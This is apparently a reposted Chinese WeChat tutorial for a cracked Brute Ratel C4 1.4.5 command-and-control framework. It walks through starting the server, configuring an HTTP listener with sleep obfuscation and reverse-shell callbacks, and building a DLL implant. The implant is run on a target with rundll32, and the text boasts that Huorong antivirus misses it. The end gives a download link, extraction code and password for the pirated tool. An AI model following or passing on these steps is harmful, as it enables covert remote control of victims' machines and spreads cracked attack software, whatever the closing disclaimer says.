使用版本:V1.4.5
官方链接:https://0xdarkvortex.dev/
将工具上传到kali服务器上
可以生成属于自己的证书
进入adhoc_scripts目录下运行,生成证书
chmod +x install.sh
chmod +x genssl.sh
然后挨个执行
执行完后将生成的key.pem 和cert.pem复制到工具的目录下
开启服务端
可以允许./brute-ratel-linx64 -ratel 命令查看支持哪些参数,感兴趣的可以根据自己需求添加参数运行
./brute-ratel-linx64_crack -ratel -a xiaoc -p xiaoc@123 -h 127.0.0.1:50000 -sc cert.pem -sk key.pem
开启客户端后会弹出一个登录框,输入刚才启动服务端时候的主机端口、账号密码点击头像登录
./Rungui.sh
进入系统界面
Brute Ratel C4 支持两种监听器 HTTP和DNS OVER HTTP
本次演示使用HTTP监听器
打开监听器设置,界面设置基本上跟CS差不多
Listener name:随意填写,监听器名称
Listener bind host:可以选择监听IP地址,默认是127.0.0.1
Rotational hosts:重定向地址,可以直接点击后面same
Port:监听的端口
Useragent:可以根据自己需求设置Useragent
URI(s):设置域名,可以随意设置,例如xiaoc.com
OS:目前仅支持windows
SSL:建议选择NO,目前YES没有上线成功
Proxy:代理
Sleep mask :休眠间隔期间的混淆策略,可以在三种技术之间进行选择:异步过程
调用 (APC)、线程池技术一或线程池技术二
Default sleep (sec):设置睡眠时间和抖动间隔。定义休眠时间和抖动间隔后,会选择休眠时间和抖动百分比之间的随机值并将其添加到休眠时间中以执行实际休眠
Common Auth:选择后,只要执行载荷就会反弹shell
one Time Auth:默认反弹一次,可以自定义,执行完规定次数后,载荷废弃,如被其他人拿到就无法再次执行
下图为本次测试的监听器配置,提供参考:
保存监听器成功
右键此监听器,选择Stageless,X64 Arch (Default) -> DLL
将木马上传到目标主机
执行命令
rundll32.exe badger_x64.dll,main
上线成功!!!!!!!!
执行命令
查看进程
查看文件
火绒最新版没有报毒
下载链接
下载远控工具Brute Ratel C4 1.4.5
链接:https://pan.baidu.com/s/1ZIxwoyBERtEeXZ9uIiQvqA?pwd=oic3 提取码:oic3
解压密码:6171bfe836af5c1e577c3feaf68ec90271a7836e6ee599c6052685ff08649ee1
原文始发于微信公众号(小C学安全):【渗透工具】远控工具Brute Ratel C4 1.4.5 --使用教程一(木马上线)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论